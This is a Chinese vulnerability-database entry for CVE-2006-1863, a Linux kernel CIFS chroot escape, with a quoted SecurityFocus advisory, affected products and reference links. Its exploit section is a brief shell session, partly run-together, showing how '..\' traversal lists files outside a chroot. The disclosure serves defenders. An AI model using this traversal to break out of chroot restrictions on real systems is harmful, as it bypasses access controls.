Linux Kernel CIFS chroot目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110152 漏洞类型 路径遍历
发布时间 2006-04-28 更新时间 2007-01-18
CVE编号 CVE-2006-1863 CNNVD-ID CNNVD-200604-444
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/27769
https://www.securityfocus.com/bid/17742
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-444
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。LinuxKernel的CIFS加载文件系统中存在输入验证错误。本地攻击者可以利用"..\\"目录遍历序列绕过chroot限制,访问受限资源。
|漏洞EXP
source: http://www.securityfocus.com/bid/17742/info

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.

The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>
|受影响的产品
Trustix Secure Linux 3.0 Trustix Secure Linux 2.2 Trustix Secure Enterprise Linux 2.0 SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21
|参考资料

来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189434
来源:www.kernel.org
链接:http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=296034f7de8bdf111984ce1630ac598a9c94a253
来源:XF
名称:kernel-cifs-directory-traversal(26141)
链接:http://xforce.iss.net/xforce/xfdb/26141
来源:TRUSTIX
名称:2006-0024
链接:http://www.trustix.org/errata/2006/0024
来源:BID
名称:17742
链接:http://www.securityfocus.com/bid/17742
来源:OSVDB
名称:25068
链接:http://www.osvdb.org/25068
来源:SUSE
名称:SUSE-SA:2006:028
链接:http://www.novell.com/linux/security/advisories/2006-05-31.html
来源:MANDRIVA
名称:MDKSA-2006:151
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:151
来源:MANDRIVA
名称:MDKSA-2006:150
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:150
来源:www.kernel.org
链接:http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.11
来源:VUPEN
名称:ADV-2006-2554
链接:http://www.frsirt.com/english/advisories/2006/2554
来源:VUPEN
名称:ADV-2006-1542
链接:http://www.frsirt.com/en